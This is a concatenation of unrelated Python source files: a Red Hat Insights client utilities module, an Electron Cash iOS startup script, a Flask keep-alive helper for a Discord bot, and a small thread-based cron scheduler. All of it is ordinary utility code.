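#   python -m idlelib -c 'print(1)'    # run a command in the shell window
#   python -m idlelib -r script.py     # run script.py in the shell window
#   python -m idlelib -d -i            # open the shell with the debugger
#
# In each case the sys.argv seen by user code is rewritten in the
# "process sys.argv and sys.path" block above.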
|
utilities.py | """
Utility functions
"""
from __future__ import absolute_import
import glob
import socket
import os
import logging
import uuid
import datetime
import shlex
import re
import sys
import threading
import time
import json
import tarfile
from subprocess import Popen, PIPE, STDOUT
import yaml
try:
from yaml import CDumper as Dumper
except ImportError:
from yaml import Dumper
from .. import package_info
from .constants import InsightsConstants as constants
from .collection_rules import InsightsUploadConf, load_yaml
from insights.core.context import Context
from insights.parsers.os_release import OsRelease
from insights.parsers.redhat_release import RedhatRelease
try:
from insights_client.constants import InsightsConstants as wrapper_constants
except ImportError:
wrapper_constants = None
logger = logging.getLogger(__name__)
def determine_hostname(display_name=None):
"""
Find fqdn if we can
"""
if display_name:
# if display_name is provided, just return the given name
return display_name
else:
socket_gethostname = socket.gethostname()
socket_fqdn = socket.getfqdn()
try:
socket_ex = socket.gethostbyname_ex(socket_gethostname)[0]
except (LookupError, socket.gaierror):
socket_ex = ''
gethostname_len = len(socket_gethostname)
fqdn_len = len(socket_fqdn)
ex_len = len(socket_ex)
if fqdn_len > gethostname_len or ex_len > gethostname_len:
if "localhost" not in socket_ex and len(socket_ex):
return socket_ex
if "localhost" not in socket_fqdn:
return socket_fqdn
return socket_gethostname
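# A minimal sketch of the resolution order above (hypothetical hostnames):
#
#   determine_hostname()              # -> 'host01.example.com' when the fqdn
#                                     #    is longer than the bare hostname
#   determine_hostname('my-display')  # -> 'my-display'; an explicit name wins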
def get_time():
    return datetime.datetime.now().isoformat()
def write_registered_file():
delete_unregistered_file()
for f in constants.registered_files:
if os.path.lexists(f):
if os.path.islink(f):
# kill symlinks and regenerate
os.remove(f)
write_to_disk(f)
else:
write_to_disk(f)
def write_unregistered_file(date=None):
"""
Write .unregistered out to disk
"""
delete_registered_file()
if date is None:
date = get_time()
for f in constants.unregistered_files:
if os.path.lexists(f):
if os.path.islink(f):
# kill symlinks and regenerate
os.remove(f)
write_to_disk(f, content=str(date))
else:
write_to_disk(f, content=str(date))
def delete_registered_file():
for f in constants.registered_files:
write_to_disk(f, delete=True)
def delete_unregistered_file():
for f in constants.unregistered_files:
write_to_disk(f, delete=True)
def delete_cache_files():
for f in glob.glob(os.path.join(constants.insights_core_lib_dir, "*.json")):
os.remove(f)
def write_to_disk(filename, delete=False, content=None):
    """
    Write filename out to disk
    """
    if content is None:
        # compute the timestamp lazily; content=get_time() in the signature
        # would be evaluated once at import time and go stale
        content = get_time()
if not os.path.exists(os.path.dirname(filename)):
return
if delete:
if os.path.lexists(filename):
os.remove(filename)
else:
with open(filename, 'wb') as f:
f.write(content.encode('utf-8'))
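# Usage sketch (hypothetical path):
#
#   write_to_disk('/tmp/example.registered')                    # timestamp body
#   write_to_disk('/tmp/example.registered', content='custom')  # explicit body
#   write_to_disk('/tmp/example.registered', delete=True)       # remove the file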
def generate_machine_id(new=False,
destination_file=constants.machine_id_file):
"""
Generate a machine-id if /etc/insights-client/machine-id does not exist
"""
machine_id = None
machine_id_file = None
logging_name = 'machine-id'
if os.path.isfile(destination_file) and not new:
logger.debug('Found %s', destination_file)
with open(destination_file, 'r') as machine_id_file:
machine_id = machine_id_file.read()
else:
logger.debug('Could not find %s file, creating', logging_name)
machine_id = str(uuid.uuid4())
logger.debug("Creating %s", destination_file)
write_to_disk(destination_file, content=machine_id)
machine_id = str(machine_id).strip()
try:
uuid.UUID(machine_id, version=4)
return machine_id
except ValueError as e:
logger.error("Invalid machine ID: %s", machine_id)
logger.error("Error details: %s", str(e))
logger.error("Remove %s and a new one will be generated.\nRerun the client with --register", destination_file)
sys.exit(constants.sig_kill_bad)
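# Usage sketch: a second call returns the persisted ID instead of minting a
# new one (assumes the destination file is writable):
#
#   first = generate_machine_id()
#   assert generate_machine_id() == first
#   fresh = generate_machine_id(new=True)  # force regeneration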
def _expand_paths(path):
"""
Expand wildcarded paths
"""
dir_name = os.path.dirname(path)
paths = []
logger.debug("Attempting to expand %s", path)
if os.path.isdir(dir_name):
files = os.listdir(dir_name)
match = os.path.basename(path)
for file_path in files:
if re.match(match, file_path):
expanded_path = os.path.join(dir_name, file_path)
paths.append(expanded_path)
logger.debug("Expanded paths %s", paths)
return paths
else:
logger.debug("Could not expand %s", path)
def validate_remove_file(config):
"""
Validate the remove file and tags file
"""
return InsightsUploadConf(config).validate()
def write_data_to_file(data, filepath):
'''
Write data to file
'''
try:
os.makedirs(os.path.dirname(filepath), 0o700)
except OSError:
pass
write_to_disk(filepath, content=data)
def magic_plan_b(filename):
'''
Use this in instances where
python-magic is MIA and can't be installed
for whatever reason
'''
    # pass the argument list directly so filenames containing spaces survive;
    # stderr is not piped, so communicate() returns None for it
    stdout, _ = Popen(['file', '--mime-type', '--mime-encoding', filename],
                      stdout=PIPE).communicate()
stdout = stdout.decode("utf-8")
mime_str = stdout.split(filename + ': ')[1].strip()
return mime_str
def run_command_get_output(cmd):
proc = Popen(shlex.split(cmd),
stdout=PIPE, stderr=STDOUT)
stdout, stderr = proc.communicate()
return {
'status': proc.returncode,
'output': stdout.decode('utf-8', 'ignore')
}
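# Usage sketch:
#
#   result = run_command_get_output('uname -r')
#   if result['status'] == 0:
#       kernel = result['output'].strip()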
def modify_config_file(updates):
'''
Update the config file with certain things
'''
cmd = '/bin/sed '
for key in updates:
cmd = cmd + '-e \'s/^#*{key}.*=.*$/{key}={value}/\' '.format(key=key, value=updates[key])
cmd = cmd + constants.default_conf_file
status = run_command_get_output(cmd)
write_to_disk(constants.default_conf_file, content=status['output'])
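# Example: modify_config_file({'auto_update': 'False'}) builds and runs
#   /bin/sed -e 's/^#*auto_update.*=.*$/auto_update=False/' <default conf file>
# and then writes the transformed text back over the config file.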
def get_version_info():
'''
Get the insights client and core versions for archival
'''
try:
client_version = wrapper_constants.version
except AttributeError:
# wrapper_constants is None or has no attribute "version"
client_version = None
version_info = {}
version_info['core_version'] = '%s-%s' % (package_info['VERSION'], package_info['RELEASE'])
version_info['client_version'] = client_version
return version_info
def print_egg_versions():
'''
Log all available eggs' versions
'''
versions = get_version_info()
logger.debug('Client version: %s', versions['client_version'])
logger.debug('Core version: %s', versions['core_version'])
logger.debug('All egg versions:')
eggs = [
os.getenv('EGG'),
'/var/lib/insights/newest.egg',
'/var/lib/insights/last_stable.egg',
'/etc/insights-client/rpm.egg',
]
if not sys.executable:
logger.debug('Python executable not found.')
return
for egg in eggs:
if egg is None:
logger.debug('ENV egg not defined.')
continue
if not os.path.exists(egg):
logger.debug('%s not found.', egg)
continue
try:
proc = Popen([sys.executable, '-c',
'from insights import package_info; print(\'%s-%s\' % (package_info[\'VERSION\'], package_info[\'RELEASE\']))'],
env={'PYTHONPATH': egg, 'PATH': os.getenv('PATH')}, stdout=PIPE, stderr=STDOUT)
except OSError:
logger.debug('Could not start python.')
return
stdout, stderr = proc.communicate()
version = stdout.decode('utf-8', 'ignore').strip()
logger.debug('%s: %s', egg, version)
def read_pidfile():
'''
Read the pidfile we wrote at launch
'''
pid = None
try:
with open(constants.pidfile) as pidfile:
pid = pidfile.read()
except IOError:
logger.debug('Could not open pidfile for reading.')
return pid
def _systemd_notify(pid):
'''
Ping the systemd watchdog with the main PID so that
the watchdog doesn't kill the process
'''
try:
proc = Popen(['/usr/bin/systemd-notify', '--pid=' + str(pid), 'WATCHDOG=1'])
except OSError as e:
logger.debug('Could not launch systemd-notify: %s', str(e))
return False
stdout, stderr = proc.communicate()
if proc.returncode != 0:
logger.debug('systemd-notify returned %s', proc.returncode)
return False
return True
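# The call above is equivalent to running
#   /usr/bin/systemd-notify --pid=<PID> WATCHDOG=1
# which resets the service's watchdog timer on behalf of the main PID.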
def systemd_notify_init_thread():
'''
Use a thread to periodically ping systemd instead
of calling it on a per-command basis
'''
pid = read_pidfile()
if not pid:
logger.debug('No PID specified.')
return
if not os.getenv('NOTIFY_SOCKET'):
# running standalone, not via systemd job
return
if not os.path.exists('/usr/bin/systemd-notify'):
# RHEL 6, no systemd
return
def _sdnotify_loop():
while True:
# run sdnotify every 30 seconds
if not _systemd_notify(pid):
# end the loop if something goes wrong
break
time.sleep(30)
sdnotify_thread = threading.Thread(target=_sdnotify_loop, args=())
sdnotify_thread.daemon = True
sdnotify_thread.start()
def get_tags(tags_file_path=constants.default_tags_file):
'''
Load tag data from the tags file.
Returns: a dict containing tags defined on the host.
'''
tags = None
if os.path.isfile(tags_file_path):
try:
tags = load_yaml(tags_file_path)
except RuntimeError:
logger.error("Invalid YAML. Unable to load %s", tags_file_path)
return None
else:
logger.debug("%s does not exist", tags_file_path)
return tags
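# Example: given a tags file containing
#   environment: production
#   group: [web, frontend]
# get_tags() would return {'environment': 'production', 'group': ['web', 'frontend']};
# it returns None both for invalid YAML and for a missing file.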
def write_tags(tags, tags_file_path=constants.default_tags_file):
"""
Writes tags to tags_file_path
Arguments:
- tags (dict): the tags to write
- tags_file_path (string): path to which tag data will be written
Returns: None
"""
with open(tags_file_path, mode="w+") as f:
data = yaml.dump(tags, Dumper=Dumper, default_flow_style=False)
f.write(data)
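# Round-trip sketch (hypothetical path):
#
#   write_tags({'environment': 'production'}, tags_file_path='/tmp/tags.yaml')
#   assert get_tags('/tmp/tags.yaml') == {'environment': 'production'}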
def migrate_tags():
'''
We initially released the tags feature with the tags file set as
tags.conf, but soon after switched it over to tags.yaml. There may be
installations out there with tags.conf files, so rename the files.
'''
tags_conf = os.path.join(constants.default_conf_dir, 'tags.conf')
tags_yaml = os.path.join(constants.default_conf_dir, 'tags.yaml')
if os.path.exists(tags_yaml):
# current default file exists, do nothing
return
if os.path.exists(tags_conf):
# old file exists and current does not
logger.info('Tags file %s detected. This filename is deprecated; please use %s. The file will be renamed automatically.',
tags_conf, tags_yaml)
try:
os.rename(tags_conf, tags_yaml)
except OSError as e:
logger.error(e)
def get_parent_process():
'''
Get parent process of the client
Returns: string
'''
ppid = os.getppid()
output = run_command_get_output('cat /proc/%s/status' % ppid)
if output['status'] == 0:
name = output['output'].splitlines()[0].split('\t')[1]
return name
else:
return "unknown"
def os_release_info():
'''
Use insights-core to fetch the os-release or redhat-release info
Returns a tuple of OS name and version
'''
os_family = "Unknown"
os_release = ""
for p in ["/etc/os-release", "/etc/redhat-release"]:
try:
with open(p) as f:
data = f.readlines()
ctx = Context(content=data, path=p, relative_path=p)
if p == "/etc/os-release":
rls = OsRelease(ctx)
os_family = rls.data.get("NAME")
os_release = rls.data.get("VERSION_ID")
elif p == "/etc/redhat-release":
rls = RedhatRelease(ctx)
os_family = rls.product
os_release = rls.version
break
except IOError:
continue
except Exception as e:
logger.warning("Failed to detect OS version: %s", e)
return (os_family, os_release)
def largest_spec_in_archive(archive_file):
logger.info("Checking for large files...")
    largest_fsize = 0
    largest_file_name = ""
    largest_spec = ""
    # get the name of the archive
    name = os.path.basename(archive_file).split(".tar.gz")[0]
    # get the archives from inside meta_data directory
    metadata_top = os.path.join(name, "meta_data/")
    data_top = os.path.join(name, "data")
    # use a context manager so the archive is closed even if an error occurs
    with tarfile.open(archive_file, 'r') as tar_file:
        for member in tar_file.getmembers():
            if metadata_top in member.name:
                file_extract = tar_file.extractfile(member.name)
                specs_metadata = json.load(file_extract)
                results = specs_metadata.get("results", [])
                if not results:
                    continue
                if not isinstance(results, list):
                    # specs with only one resulting file are not in list form
                    results = [results]
                for result in results:
                    # get the path of the spec result and check its filesize
                    fname = result.get("object", {}).get("relative_path")
                    abs_fname = os.path.join('.', data_top, fname)
                    # get the archives from inside data directory
                    data_file = tar_file.getmember(abs_fname)
                    if data_file.size > largest_fsize:
                        largest_fsize = data_file.size
                        largest_file_name = fname
                        largest_spec = specs_metadata["name"]
    return (largest_file_name, largest_fsize, largest_spec)
def size_in_mb(num_bytes):
return float(num_bytes) / (1024 * 1024)
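# Usage sketch tying the two helpers above together (hypothetical archive):
#
#   fname, fsize, spec = largest_spec_in_archive('/tmp/insights-host.tar.gz')
#   logger.info('Largest file %s (%.2f MB) from spec %s',
#               fname, size_in_mb(fsize), spec)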
|
app.py | #
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
#
import os
from electroncash_gui.ios_native.monkeypatches import MonkeyPatches
from electroncash.util import set_verbosity
from electroncash_gui.ios_native import ElectrumGui
from electroncash_gui.ios_native.utils import call_later, get_user_dir, cleanup_tmp_dir, is_debug_build, NSLogSuppress, NSLog
from electroncash.simple_config import SimpleConfig
# NB: This is called from appdelegate.py "application_didFinishLaunchingWithOptions_"
def main():
cleanup_tmp_dir()
config_options = {
'verbose': is_debug_build(),
'cmd': 'gui',
'gui': 'ios_native',
'cwd': os.getcwd(),
        'whitelist_servers_only': True,  # on iOS, force only the whitelist ('preferred') servers for now, as a security measure
}
set_verbosity(config_options.get('verbose'), timestamps=False, thread_id=False)
NSLogSuppress(not config_options.get('verbose'))
MonkeyPatches.patch()
config = SimpleConfig(config_options, read_user_dir_function = get_user_dir)
gui = ElectrumGui(config)
call_later(0.010, gui.main) # this is required for the activity indicator to actually animate. Switch to a direct call if not using activity indicator on Splash2
_printStats(config_options) # Prints some startup/debug stats such as Python version and SSL version (this is done in another thread to hopefully not impact startup overhead too much, as importing ssl may be a bit heavy)
return "Bitcoin Cash FTW!"
def _printStats(config_options):
import threading
def thrdfunc(config_options):
# lazy init of SSL
import ssl, sys
from electroncash import version
NSLog("Electron Cash lib version: %s (using server protocol: %s)", version.PACKAGE_VERSION, version.PROTOCOL_VERSION)
NSLog("Python version: %s", ' '.join(sys.version.split('\n')))
NSLog("OpenSSL version: %s", ssl.OPENSSL_VERSION)
#NSLog("Environment Vars:")
#for k,v in os.environ.copy().items():
# NSLog("%s=%s", str(k), str(v))
#NSLog("Config Vars:")
#for k,v in config_options.copy().items():
# NSLog("config[%s] = %s", str(k), str(v))
# /
# We do this from a thread so as to not delay app startup by importing more stuff we don't strictly need.
threading.Thread(target=thrdfunc, args=(config_options,), daemon=True).start()
|
keep_bot_alive.py | from discord.ext import tasks
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Bot is running"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
# NOTE: assumes a global `status` iterator supplied by the importing bot,
# e.g. status = itertools.cycle(["online", "helping users"])
@tasks.loop(seconds=10)
async def change_status(client, discord):
    await client.change_presence(activity=discord.Game(next(status)))
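# Wiring sketch (assumes a discord.py client and token defined elsewhere):
#
#   keep_alive()                           # start the Flask ping server
#   change_status.start(client, discord)   # begin the 10-second status loop
#   client.run(TOKEN)                      # TOKEN is a placeholder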
|
cron.py | # coding: utf-8
import uuid
import threading
import time
from . import patch
class Crontab(object):
def __init__(self):
self._tasks = {}
self._running = False
self._cycle = 3.0
self._drain()
def start(self):
self._running = True
def stop(self):
self._running = False
def running(self):
return self._running
def addfunc(self, func, *args, **kwargs):
key = str(uuid.uuid4())
self._tasks[key] = [func, args, kwargs]
return key
def delfunc(self, key):
        del self._tasks[key]
@patch.go
def _drain(self):
while True:
if not self._running:
time.sleep(1.5)
continue
for task in self._tasks.values():
func, args, kwargs = task
t = threading.Thread(target=func, args=args, kwargs=kwargs)
                t.daemon = True
t.start()
time.sleep(max(0.5, self._cycle))
if __name__ == '__main__':
m = Crontab()
    def say(msg='hello'):
        print('say:', msg)
m.addfunc(say, 'hi')
key = m.addfunc(say, 'hey')
m.start()
time.sleep(2)
m.delfunc(key)
time.sleep(2)
    print('stop', m.running())
m.stop()
time.sleep(2)
|